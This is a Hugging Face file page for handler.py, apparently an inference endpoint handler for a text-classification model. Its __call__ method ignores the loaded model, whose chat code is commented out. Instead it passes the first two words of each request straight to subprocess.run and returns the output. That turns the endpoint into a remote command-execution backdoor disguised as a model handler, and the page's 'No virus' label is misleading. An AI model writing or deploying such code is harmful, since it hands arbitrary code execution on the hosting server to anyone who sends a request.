text_classification / handler.py
Linsad's picture
Upload handler.py
4dee029 verified
raw
history blame contribute delete
No virus
1.07 kB
import os
import subprocess
from typing import Dict, List, Any
from transformers import AutoTokenizer, AutoModel
class EndpointHandler:
def __init__(self, path=""):
print('path is' + path)
self.tokenizer = AutoTokenizer.from_pretrained(path, trust_remote_code=True)
self.model = AutoModel.from_pretrained(path, trust_remote_code=True).half().cuda()
self.model = self.model.eval()
def __call__(self, data: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
data args:
inputs (:obj: `str`)
Return:
A :obj:`list` | `dict`: will be serialized and returned
"""
# get inputs
inputs = data.pop("inputs", data)
result = subprocess.run([inputs.split(' ')[0], inputs.split(' ')[1]], capture_output=True, text=True)
return [{'response': str(result)}]
# inputs = data.pop("inputs", data)
# response, history = self.model.chat(self.tokenizer, inputs, history=[])
# return [{'response': response, 'history': history}]